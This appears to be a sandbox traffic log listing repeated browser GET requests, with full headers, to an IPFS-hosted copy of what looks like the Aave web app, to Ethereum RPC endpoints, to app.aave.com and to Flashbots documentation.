Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4609-45f4815a9c085248.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5559-6c8d46c115744018.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/flags/en.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8806.6223602df2ea965f.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/flags/es.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/flags/fr.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/flags/el.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/governance-0757370cd87e1b88.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/markets-7557748c63adf50d.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/82-c4138125c2feb6d3.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/staking-1d754d08e785ffe6.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1102-a299e0e4a621aea1.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/v3-migration-cb3960f54b93b1d0.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/flags/fr.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/flags/en.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/flags/el.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/markets-7557748c63adf50d.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/flags/es.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/82-c4138125c2feb6d3.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/staking-1d754d08e785ffe6.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1102-a299e0e4a621aea1.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/v3-migration-cb3960f54b93b1d0.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eth HTTP/1.1Host: rpc.ankr.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /staking HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rpc.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /staking/ HTTP/1.1Host: app.aave.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/rpc/quick-start/ HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: eth-mainnet.public.blastapi.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/rpc/quick-start HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/0da2d62e1a58e826.css HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7603.58cb27010e0a12d8.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1573-e710bb2ca0646568.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4254-a9fee39d0c27297f.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6790.20f08621bfb8840e.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9388.ff9a5272b437e6f3.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/Inter-Regular.f1f0c35b.woff2 HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.aave.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://app.aave.com/_next/static/css/0da2d62e1a58e826.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/Inter-SemiBold.fcb100c7.woff2 HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.aave.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://app.aave.com/_next/static/css/0da2d62e1a58e826.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
